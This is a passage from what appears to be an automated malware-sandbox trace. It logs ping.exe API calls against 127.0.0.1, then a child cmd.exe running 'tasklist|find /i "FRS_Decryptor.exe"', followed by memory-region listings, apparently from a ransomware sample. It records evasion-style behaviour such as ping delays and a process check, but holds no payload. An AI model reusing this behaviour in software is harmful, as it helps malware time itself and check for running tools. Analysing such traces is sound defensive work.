lpBuffer="h✨") returned 0x0 [0130.730] _fileno (_File=0x76ea4c28) returned 1 [0130.730] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0130.730] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.730] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x838a60 [0130.730] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x838a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0130.730] _fileno (_File=0x76ea4c28) returned 1 [0130.730] _write (in: _FileHandle=1, _Buf=0x838a60*, _MaxCharCount=0x9 | out: _Buf=0x838a60*) returned 9 [0130.730] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.731] _fileno (_File=0x76ea4c28) returned 1 [0130.731] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0130.731] LocalFree (hMem=0x838a60) returned 0x0 [0130.731] LocalFree (hMem=0x847b08) returned 0x0 [0130.731] Sleep (dwMilliseconds=0x3e8) [0131.747] IcmpSendEcho2Ex (in: IcmpHandle=0x836a68, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x83c2a0, RequestSize=0x20, RequestOptions=0x68efbc, ReplyBuffer=0x845270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x845270) returned 0x1 [0131.747] InetNtopW (in: Family=2, pAddr=0x68efac, pStringBuf=0x68f0d4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0131.748] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x68ef40, nSize=0x0, Arguments=0x68ef3c | out: lpBuffer="竨\x84樂h⛔\x94䰨盪✣") returned 0x16 [0131.748] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0131.748] _fileno (_File=0x76ea4c28) returned 1 [0131.748] _get_osfhandle (_FileHandle=1) returned 0x28 [0131.748] GetFileType (hFile=0x28) returned 0x2 [0131.748] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ef04 | out: lpMode=0x68ef04) returned 0 [0131.748] GetLastError () returned 0x6 [0131.748] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68ee68, nSize=0x50 | out: lpBuffer="h✣") returned 0x0 [0131.748] _fileno (_File=0x76ea4c28) returned 1 [0131.748] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0131.748] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0131.748] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x847fe8 [0131.748] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x847fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0131.748] _fileno (_File=0x76ea4c28) returned 1 [0131.748] _write (in: _FileHandle=1, _Buf=0x847fe8*, _MaxCharCount=0x16 | out: _Buf=0x847fe8*) returned 22 [0131.748] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0131.748] _fileno (_File=0x76ea4c28) returned 1 [0131.748] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0131.748] LocalFree (hMem=0x847fe8) returned 0x0 [0131.748] LocalFree (hMem=0x847ae8) returned 0x0 [0131.748] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x68ef40, nSize=0x0, Arguments=0x68ef3c | out: lpBuffer="翨\x84樂h⛿\x94䰨盪✼") returned 0x9 [0131.748] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0131.748] _fileno (_File=0x76ea4c28) returned 1 [0131.748] _get_osfhandle (_FileHandle=1) returned 0x28 [0131.748] GetFileType (hFile=0x28) returned 0x2 [0131.748] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ef04 | out: lpMode=0x68ef04) returned 0 [0131.748] GetLastError () returned 0x6 [0131.748] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68ee68, nSize=0x50 | out: lpBuffer="h✼") returned 0x0 [0131.748] _fileno (_File=0x76ea4c28) returned 1 [0131.748] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0131.748] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0131.748] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x838970 [0131.748] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x838970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0131.748] _fileno (_File=0x76ea4c28) returned 1 [0131.748] _write (in: _FileHandle=1, _Buf=0x838970*, _MaxCharCount=0x9 | out: _Buf=0x838970*) returned 9 [0131.748] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0131.748] _fileno (_File=0x76ea4c28) returned 1 [0131.749] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0131.749] LocalFree (hMem=0x838970) returned 0x0 [0131.749] LocalFree (hMem=0x847fe8) returned 0x0 [0131.749] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x68ef44, nSize=0x0, Arguments=0x68ef40 | out: lpBuffer="翨\x84樂h➷\x94䰨盪✧") returned 0x9 [0131.749] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0131.749] _fileno (_File=0x76ea4c28) returned 1 [0131.749] _get_osfhandle (_FileHandle=1) returned 0x28 [0131.749] GetFileType (hFile=0x28) returned 0x2 [0131.749] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ef08 | out: lpMode=0x68ef08) returned 0 [0131.749] GetLastError () returned 0x6 [0131.749] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68ee6c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0131.749] _fileno (_File=0x76ea4c28) returned 1 [0131.749] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0131.749] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0131.749] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x838a60 [0131.749] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x838a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0131.749] _fileno (_File=0x76ea4c28) returned 1 [0131.749] _write (in: _FileHandle=1, _Buf=0x838a60*, _MaxCharCount=0x9 | out: _Buf=0x838a60*) returned 9 [0131.749] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0131.749] _fileno (_File=0x76ea4c28) returned 1 [0131.749] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0131.749] LocalFree (hMem=0x838a60) returned 0x0 [0131.749] LocalFree (hMem=0x847fe8) returned 0x0 [0131.749] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x68ef40, nSize=0x0, Arguments=0x68ef3c | out: lpBuffer="翨\x84樂h⟘\x94䰨盪✨") returned 0x9 [0131.749] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0131.749] _fileno (_File=0x76ea4c28) returned 1 [0131.749] _get_osfhandle (_FileHandle=1) returned 0x28 [0131.749] GetFileType (hFile=0x28) returned 0x2 [0131.749] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ef04 | out: lpMode=0x68ef04) returned 0 [0131.749] GetLastError () returned 0x6 [0131.749] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68ee68, nSize=0x50 | out: lpBuffer="h✨") returned 0x0 [0131.749] _fileno (_File=0x76ea4c28) returned 1 [0131.749] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0131.749] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0131.749] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x838a60 [0131.749] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x838a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0131.749] _fileno (_File=0x76ea4c28) returned 1 [0131.749] _write (in: _FileHandle=1, _Buf=0x838a60*, _MaxCharCount=0x9 | out: _Buf=0x838a60*) returned 9 [0131.749] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0131.749] _fileno (_File=0x76ea4c28) returned 1 [0131.749] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0131.749] LocalFree (hMem=0x838a60) returned 0x0 [0131.749] LocalFree (hMem=0x847fe8) returned 0x0 [0131.749] Sleep (dwMilliseconds=0x3e8) [0132.762] IcmpSendEcho2Ex (in: IcmpHandle=0x836a68, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x83c2a0, RequestSize=0x20, RequestOptions=0x68efbc, ReplyBuffer=0x845270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x845270) returned 0x1 [0132.763] InetNtopW (in: Family=2, pAddr=0x68efac, pStringBuf=0x68f0d4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0132.763] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x68ef40, nSize=0x0, Arguments=0x68ef3c | out: lpBuffer="竨\x84樂h⛔\x94䰨盪✣") returned 0x16 [0132.763] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0132.763] _fileno (_File=0x76ea4c28) returned 1 [0132.763] _get_osfhandle (_FileHandle=1) returned 0x28 [0132.763] GetFileType (hFile=0x28) returned 0x2 [0132.763] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ef04 | out: lpMode=0x68ef04) returned 0 [0132.763] GetLastError () returned 0x6 [0132.763] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68ee68, nSize=0x50 | out: lpBuffer="h✣") returned 0x0 [0132.763] _fileno (_File=0x76ea4c28) returned 1 [0132.763] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0132.763] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0132.763] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x847fe8 [0132.763] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x847fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0132.763] _fileno (_File=0x76ea4c28) returned 1 [0132.763] _write (in: _FileHandle=1, _Buf=0x847fe8*, _MaxCharCount=0x16 | out: _Buf=0x847fe8*) returned 22 [0132.763] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0132.763] _fileno (_File=0x76ea4c28) returned 1 [0132.763] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0132.763] LocalFree (hMem=0x847fe8) returned 0x0 [0132.763] LocalFree (hMem=0x847ae8) returned 0x0 [0132.763] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x68ef40, nSize=0x0, Arguments=0x68ef3c | out: lpBuffer="翨\x84樂h⛿\x94䰨盪✼") returned 0x9 [0132.763] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0132.763] _fileno (_File=0x76ea4c28) returned 1 [0132.763] _get_osfhandle (_FileHandle=1) returned 0x28 [0132.763] GetFileType (hFile=0x28) returned 0x2 [0132.763] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ef04 | out: lpMode=0x68ef04) returned 0 [0132.763] GetLastError () returned 0x6 [0132.763] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68ee68, nSize=0x50 | out: lpBuffer="h✼") returned 0x0 [0132.763] _fileno (_File=0x76ea4c28) returned 1 [0132.763] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0132.763] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0132.763] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x838970 [0132.763] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x838970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0132.763] _fileno (_File=0x76ea4c28) returned 1 [0132.763] _write (in: _FileHandle=1, _Buf=0x838970*, _MaxCharCount=0x9 | out: _Buf=0x838970*) returned 9 [0132.763] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0132.763] _fileno (_File=0x76ea4c28) returned 1 [0132.763] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0132.763] LocalFree (hMem=0x838970) returned 0x0 [0132.763] LocalFree (hMem=0x847fe8) returned 0x0 [0132.764] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x68ef44, nSize=0x0, Arguments=0x68ef40 | out: lpBuffer="翨\x84樂h➷\x94䰨盪✧") returned 0x9 [0132.764] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0132.764] _fileno (_File=0x76ea4c28) returned 1 [0132.764] _get_osfhandle (_FileHandle=1) returned 0x28 [0132.764] GetFileType (hFile=0x28) returned 0x2 [0132.764] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ef08 | out: lpMode=0x68ef08) returned 0 [0132.764] GetLastError () returned 0x6 [0132.764] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68ee6c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0132.764] _fileno (_File=0x76ea4c28) returned 1 [0132.764] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0132.764] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0132.764] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x838970 [0132.764] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x838970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0132.764] _fileno (_File=0x76ea4c28) returned 1 [0132.764] _write (in: _FileHandle=1, _Buf=0x838970*, _MaxCharCount=0x9 | out: _Buf=0x838970*) returned 9 [0132.764] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0132.764] _fileno (_File=0x76ea4c28) returned 1 [0132.764] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0132.764] LocalFree (hMem=0x838970) returned 0x0 [0132.764] LocalFree (hMem=0x847fe8) returned 0x0 [0132.764] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x68ef40, nSize=0x0, Arguments=0x68ef3c | out: lpBuffer="翨\x84樂h⟘\x94䰨盪✨") returned 0x9 [0132.764] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0132.764] _fileno (_File=0x76ea4c28) returned 1 [0132.764] _get_osfhandle (_FileHandle=1) returned 0x28 [0132.764] GetFileType (hFile=0x28) returned 0x2 [0132.764] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ef04 | out: lpMode=0x68ef04) returned 0 [0132.764] GetLastError () returned 0x6 [0132.764] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68ee68, nSize=0x50 | out: lpBuffer="h✨") returned 0x0 [0132.764] _fileno (_File=0x76ea4c28) returned 1 [0132.764] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0132.764] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0132.764] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x838a90 [0132.764] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x838a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0132.764] _fileno (_File=0x76ea4c28) returned 1 [0132.764] _write (in: _FileHandle=1, _Buf=0x838a90*, _MaxCharCount=0x9 | out: _Buf=0x838a90*) returned 9 [0132.764] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0132.764] _fileno (_File=0x76ea4c28) returned 1 [0132.764] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0132.764] LocalFree (hMem=0x838a90) returned 0x0 [0132.764] LocalFree (hMem=0x847fe8) returned 0x0 [0132.764] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x68eec8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0132.764] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x68ee9c, nSize=0x0, Arguments=0x68ee98 | out: lpBuffer="翨\x84h᧰\x94䰨盪❏") returned 0x5c [0132.764] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0132.764] _fileno (_File=0x76ea4c28) returned 1 [0132.764] _get_osfhandle (_FileHandle=1) returned 0x28 [0132.764] GetFileType (hFile=0x28) returned 0x2 [0132.764] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ee60 | out: lpMode=0x68ee60) returned 0 [0132.764] GetLastError () returned 0x6 [0132.764] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68edc4, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0132.765] _fileno (_File=0x76ea4c28) returned 1 [0132.765] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0132.765] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0132.765] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0x8480b0 [0132.765] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x8480b0, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0132.765] _fileno (_File=0x76ea4c28) returned 1 [0132.765] _write (in: _FileHandle=1, _Buf=0x8480b0*, _MaxCharCount=0x5c | out: _Buf=0x8480b0*) returned 92 [0132.765] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0132.765] _fileno (_File=0x76ea4c28) returned 1 [0132.765] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0132.765] LocalFree (hMem=0x8480b0) returned 0x0 [0132.765] LocalFree (hMem=0x847fe8) returned 0x0 [0132.765] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x68eea8, nSize=0x0, Arguments=0x68eea4 | out: lpBuffer="翨\x84hᨧ\x94䰨盪❓") returned 0x61 [0132.765] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0132.765] _fileno (_File=0x76ea4c28) returned 1 [0132.765] _get_osfhandle (_FileHandle=1) returned 0x28 [0132.765] GetFileType (hFile=0x28) returned 0x2 [0132.765] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x68ee6c | out: lpMode=0x68ee6c) returned 0 [0132.765] GetLastError () returned 0x6 [0132.765] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x68edd0, nSize=0x50 | out: lpBuffer="h❓") returned 0x0 [0132.765] _fileno (_File=0x76ea4c28) returned 1 [0132.765] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0132.765] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0132.765] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0x8480b8 [0132.765] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x8480b8, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0132.765] _fileno (_File=0x76ea4c28) returned 1 [0132.765] _write (in: _FileHandle=1, _Buf=0x8480b8*, _MaxCharCount=0x61 | out: _Buf=0x8480b8*) returned 97 [0132.765] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0132.765] _fileno (_File=0x76ea4c28) returned 1 [0132.765] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0132.765] LocalFree (hMem=0x8480b8) returned 0x0 [0132.765] LocalFree (hMem=0x847fe8) returned 0x0 [0132.765] IcmpCloseHandle (IcmpHandle=0x836a68) returned 1 [0132.765] LocalFree (hMem=0x83c2a0) returned 0x0 [0132.765] LocalFree (hMem=0x845270) returned 0x0 [0132.765] WSACleanup () returned 0 [0132.766] exit (_Code=0) Thread: id = 401 os_tid = 0x2a4 Thread: id = 402 os_tid = 0x664 Process: id = "143" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x618ad000" os_pid = "0x5e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7377 start_va = 0x810000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 7378 start_va = 0x830000 end_va = 0x831fff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 7379 start_va = 0x840000 end_va = 0x84efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 7380 start_va = 0x850000 end_va = 0x88ffff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 7381 start_va = 0x890000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 7382 start_va = 0x990000 end_va = 0x993fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 7383 start_va = 0x9a0000 end_va = 0x9a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 7384 start_va = 0x9b0000 end_va = 0x9b1fff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 7385 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 7386 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7387 start_va = 0x7eae0000 end_va = 0x7eb02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eae0000" filename = "" Region: id = 7388 start_va = 0x7eb0a000 end_va = 0x7eb0cfff entry_point = 0x0 region_type = private name = "private_0x000000007eb0a000" filename = "" Region: id = 7389 start_va = 0x7eb0d000 end_va = 0x7eb0dfff entry_point = 0x0 region_type = private name = "private_0x000000007eb0d000" filename = "" Region: id = 7390 start_va = 0x7eb0f000 end_va = 0x7eb0ffff entry_point = 0x0 region_type = private name = "private_0x000000007eb0f000" filename = "" Region: id = 7391 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7392 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7393 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7394 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7395 start_va = 0xa90000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 7396 start_va = 